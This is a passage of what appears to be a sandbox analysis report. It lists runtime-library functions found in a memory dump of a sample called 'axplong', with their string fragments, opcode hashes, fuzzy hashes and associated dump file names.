                                • ___std_exception_copy.LIBVCRUNTIME ref: 0050247E
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID: ___std_exception_copy
                                • String ID: 'kQd+V$P#P$P#P
                                • API String ID: 2659868963-283308068
                                • Opcode ID: da61c383ecfd8c7e14061b96e95c9c7dceab34e0b26cf9d4c79d81c0fae4df79
                                • Instruction ID: 52b9477226ac8074429e68d047fa588122cfa7f3ae99efc0a2e13d80d693607f
                                • Opcode Fuzzy Hash: da61c383ecfd8c7e14061b96e95c9c7dceab34e0b26cf9d4c79d81c0fae4df79
                                • Instruction Fuzzy Hash: 16F0E5B191030D67CB14EBE4D80988ABBECEE55310F008A26FA44E7940F770FA488B91
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID: _strrchr
                                • String ID:
                                • API String ID: 3213747228-0
                                • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                                • Instruction ID: eea36df060cc8a6fdcae9e5c499012ba6b8ba5af9e835f1487b98e757915755d
                                • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                                • Instruction Fuzzy Hash: 4CB1053290028A9FDB15CF68C8917BEBFE5FF95340F1485AAE855BB342D6349D41CB60
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xtime_diff_to_millis2_xtime_get
                                • String ID:
                                • API String ID: 531285432-0
                                • Opcode ID: f86ae5e405dc77ad70e0d2ae75646719710f09f571005315b4c21c10fdf1eabf
                                • Instruction ID: 8bc110ba499ae20b55c15dff298e143331423397f27bdc5e79438d60d326df37
                                • Opcode Fuzzy Hash: f86ae5e405dc77ad70e0d2ae75646719710f09f571005315b4c21c10fdf1eabf
                                • Instruction Fuzzy Hash: AB21417590020AAFEF11EFA4CC459EEBF79FF48714F000065F501A7251DB31AD819BA1
                                APIs
                                • __Mtx_init_in_situ.LIBCPMT ref: 0051726C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID: Mtx_init_in_situ
                                • String ID: @.P$`zQ
                                • API String ID: 3366076730-1927873245
                                • Opcode ID: d1a537a7082809758919d85946371b0d0998ae909a7d10ac9f05a52f1cb8f525
                                • Instruction ID: de9aa484451bcd22d34504ec1d8309975c32112be78e66fb0e4de069a0589310
                                • Opcode Fuzzy Hash: d1a537a7082809758919d85946371b0d0998ae909a7d10ac9f05a52f1cb8f525
                                • Instruction Fuzzy Hash: EFA138B4A01619CFEB21CFA8C88479EBBF1BF48710F14855AE819AB351D7759D41CF80
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID: ___free_lconv_mon
                                • String ID: 8"V$`'V
                                • API String ID: 3903695350-3298631664
                                • Opcode ID: 8391b321707d5c56d7c6095f7d2c36cd7d311ba972f144b69481120313b55809
                                • Instruction ID: 43b6596017030249d4f8a00c4d4c443a57ea7c5c8adba2953c509b3c2b9d439d
                                • Opcode Fuzzy Hash: 8391b321707d5c56d7c6095f7d2c36cd7d311ba972f144b69481120313b55809
                                • Instruction Fuzzy Hash: C8312C35A0060ADFDB21AB78DD49B5A7BE9BF80310F145839F496D7192DF75AC808B21
                                APIs
                                • __Mtx_init_in_situ.LIBCPMT ref: 00503962
                                • __Mtx_init_in_situ.LIBCPMT ref: 005039A1
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID: Mtx_init_in_situ
                                • String ID: pBP
                                • API String ID: 3366076730-43306289
                                • Opcode ID: 2141b03d7980df3ae3e1b570d2a4e52e480b061f1d7c4e9768fd3f6ddbb2b2a1
                                • Instruction ID: b979f8a81575aac92a759035b837313c622e4b52cc4f05af6586fe0dd16127f6
                                • Opcode Fuzzy Hash: 2141b03d7980df3ae3e1b570d2a4e52e480b061f1d7c4e9768fd3f6ddbb2b2a1
                                • Instruction Fuzzy Hash: 0D4136B06017058FD720CF18C58875ABBF5FF84315F108A19E86A8B381E7B5EA05CB80
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 00502552
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID: ___std_exception_copy
                                • String ID: P#P$P#P
                                • API String ID: 2659868963-2445065942
                                • Opcode ID: 1d657bd42b701b763eabb5f6ebb04eb03c72fb95d310d4b9db6c9fc9906ff941
                                • Instruction ID: 98acc6304d946294b0cad7384c8ad9b11b4f36b803bba4b140161893ee9f427d
                                • Opcode Fuzzy Hash: 1d657bd42b701b763eabb5f6ebb04eb03c72fb95d310d4b9db6c9fc9906ff941
                                • Instruction Fuzzy Hash: 26F0A771D1020DABCB14DFA8D8419CEBFF4BF55304F1082AEE84567240EB715B59CB95